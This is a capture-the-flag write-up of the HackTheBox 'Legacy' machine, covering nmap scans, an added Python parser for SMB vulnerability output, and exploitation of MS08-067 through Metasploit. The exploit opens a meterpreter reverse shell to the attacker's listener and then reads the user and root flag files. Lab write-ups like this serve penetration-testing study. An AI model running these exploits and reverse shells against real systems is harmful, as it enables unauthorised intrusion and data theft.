Legacy

Introduction:
Recon
# nmap -sS -sC -sV -T4 -oN nmap.legacy.txt 10.10.10.4
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 12:13 EST
Nmap scan report for 10.10.10.4
Host is up (0.012s latency).
All 1000 scanned ports on 10.10.10.4 are filtered

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.01 seconds
root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/legacy/data# nmap -sS -sC -sV -T4 -oN nmap.legacy.txt 10.10.10.4
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 12:37 EST
Nmap scan report for 10.10.10.4
Host is up (0.016s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: -3h52m01s, deviation: 1h24m50s, median: -4h52m01s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:9d:05 (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020-12-22T16:45:40+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.74 seconds

------------------------------------------------------------
Threader 3000 - Multi-threaded Port Scanner
Version 1.0.6
A project by The Mayor
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.10.4
------------------------------------------------------------
Scanning target 10.10.10.4
Time started: 2020-12-22 12:38:01.861772
------------------------------------------------------------
Port 139 is open
Port 445 is open
Port scan completed in 0:01:39.852210
root@kinetic:/usr/share/nmap/scripts# pwd
/usr/share/nmap/scripts
root@kinetic:/usr/share/nmap/scripts# ls *smb*
smb2-capabilities.nse smb-enum-groups.nse smb-ls.nse smb-server-stats.nse smb-vuln-ms08-067.nse
smb2-security-mode.nse smb-enum-processes.nse smb-mbenum.nse smb-system-info.nse smb-vuln-ms10-054.nse
smb2-time.nse smb-enum-services.nse smb-os-discovery.nse smb-vuln-conficker.nse smb-vuln-ms10-061.nse
smb2-vuln-uptime.nse smb-enum-sessions.nse smb-print-text.nse smb-vuln-cve2009-3103.nse smb-vuln-ms17-010.nse
smb-brute.nse smb-enum-shares.nse smb-protocols.nse smb-vuln-cve-2017-7494.nse smb-vuln-regsvc-dos.nse
smb-double-pulsar-backdoor.nse smb-enum-users.nse smb-psexec.nse smb-vuln-ms06-025.nse smb-vuln-webexec.nse
smb-enum-domains.nse smb-flood.nse smb-security-mode.nse smb-vuln-ms07-029.nse smb-webexec-exploit.nse
root@kinetic:/usr/share/nmap/scripts#

Notes:
- The server runs an extremely old OS: Windows XP.
- The SMB ports are open and allow guest login, and smb-security-mode reports message_signing: disabled. MS17-010 is possible.
Enumeration
nmap -sS -sV --script smb-vuln* 10.10.10.4
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 12:51 EST
Nmap scan report for 10.10.10.4
Host is up (0.014s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.14 seconds

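To triage script output like the scan above without reading it by eye, here is an added Python example (not part of the original writeup) that parses nmap's "Host script results" block into per-script findings: it flags disabled SMB signing from smb-security-mode and pulls each smb-vuln-* script's State and CVE ids, including the one-line "false" and "ERROR" results. The embedded sample is a constructed excerpt in the shape of the output above, and the header/key split is a heuristic on script-name spelling because extraction can collapse nmap's indentation.

```python
import re
# Constructed sample in the shape of nmap's "Host script results" section for the
# smb-security-mode and smb-vuln-* scripts (an excerpt, not the page's full scan).
SAMPLE_NMAP = """\
Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb-vuln-ms08-067:
|   VULNERABLE:
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|     State: VULNERABLE
|_    IDs:  CVE:CVE-2017-0143
"""
# A script header is "| name:" or "|_name:". NSE names are lowercase and hyphenated,
# which separates them from nested keys ("State:", "account_used:") without indentation.
HEADER_RE = re.compile(r"^\|_?\s*(?P<name>[a-z0-9]+(?:-[a-z0-9]+)+):\s*(?P<rest>.*)$")
KEY_RE = re.compile(r"^\|_?\s*(?P<key>[A-Za-z_ ]+):\s*(?P<value>.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d+")

def parse_host_scripts(text):
    """Map script name -> [(key, value)]; a value on the header line is keyed 'result'."""
    scripts, current = {}, None
    for line in (l for l in text.splitlines() if l.startswith("|")):
        header = HEADER_RE.match(line)
        if header:
            current = header["name"]
            scripts[current] = [("result", header["rest"])] if header["rest"] else []
            continue
        key = KEY_RE.match(line)
        if current and key:
            scripts[current].append((key["key"].strip(), key["value"].strip()))
    return scripts

def smb_findings(text):
    """Summarise SMB exposure: disabled signing plus each smb-vuln-* state and CVEs."""
    findings = []
    for name, pairs in parse_host_scripts(text).items():
        kv = dict(pairs)
        if name == "smb-security-mode" and kv.get("message_signing", "").startswith("disabled"):
            findings.append({"script": name, "state": "SIGNING DISABLED", "cves": []})
        elif name.startswith("smb-vuln-"):
            # Completed scripts give a State line; one-liners put "false"/"ERROR: ..." on the header.
            state = kv.get("State") or kv.get("result", "").split(":")[0] or "UNKNOWN"
            cves = sorted({c for _, v in pairs for c in CVE_RE.findall(v)})
            findings.append({"script": name, "state": state, "cves": cves})
    return findings
```

Run it over a full `-oN` file and anything whose state contains "VULNERABLE" or equals "SIGNING DISABLED" is the remediation list for that host (patching and enabling SMB signing, respectively).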
Exploitation
Clearly, the host is vulnerable to smb-vuln-ms08-067 and smb-vuln-ms17-010; let's try both.
smb-vuln-ms08-067
exploit(windows/smb/ms17_010_psexec) > search ms08-067

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

msf6 exploit(windows/smb/ms17_010_psexec) > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) >
msf6 exploit(windows/smb/ms08_067_netapi) >
msf6 exploit(windows/smb/ms08_067_netapi) >
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.0.8 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic Targeting


msf6 exploit(windows/smb/ms08_067_netapi) > set lhost tun0
lhost => tun0
msf6 exploit(windows/smb/ms08_067_netapi) > set lport 4444
lport => 4444
msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.15:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:Unknown
[*] 10.10.10.4:445 - We could not detect the language pack, defaulting to English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.15:4444 -> 10.10.10.4:1028) at 2020-12-22 13:56:03 -0500

meterpreter > ls
Listing: C:\WINDOWS\system32
============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 261 fil 2017-03-16 01:20:00 -0400 $winnt$.inf
40777/rwxrwxrwx 0 dir 2017-03-16 01:18:34 -0400 1025

Post-exploit/PrivEsc
msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.15:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] Meterpreter session 2 opened (10.10.14.15:4444 -> 10.10.10.4:1029) at 2020-12-22 14:02:35 -0500

meterpreter > pwd
C:\
meterpreter > sysinfo
Computer : LEGACY
OS : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > pwd
C:\
meterpreter > cd C:\Documents\ and\ Settings
meterpreter > pwd
C:\Documents and Settings
meterpreter > ls
Listing: C:\Documents and Settings
==================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Administrator
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 All Users
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 Default User
40777/rwxrwxrwx 0 dir 2017-03-16 01:32:52 -0400 LocalService
40777/rwxrwxrwx 0 dir 2017-03-16 01:32:42 -0400 NetworkService
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 john

meterpreter > cd john
meterpreter > ls
Listing: C:\Documents and Settings\john
=======================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Application Data
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Cookies
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Desktop
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Favorites
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Local Settings
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 My Documents
100666/rw-rw-rw- 524288 fil 2017-03-16 01:33:41 -0400 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2017-03-16 01:33:41 -0400 NTUSER.DAT.LOG
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 NetHood
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 PrintHood
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Recent
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 SendTo
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Start Menu
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Templates
100666/rw-rw-rw- 178 fil 2017-03-16 01:33:42 -0400 ntuser.ini

meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 32 fil 2017-03-16 02:19:32 -0400 user.txt

meterpreter > cat user.txt
e6XXXXXXXXXXXXXXXXXXXXXXX4f
meterpreter > pwd
C:\Documents and Settings\john\Desktop
meterpreter > cd ../../Administrator/Desktop
meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 32 fil 2017-03-16 02:18:19 -0400 root.txt

meterpreter > cat root.txt
99XXXXXXXXXXXXXXXXXXXXXXXXXX13
meterpreter >

Notes: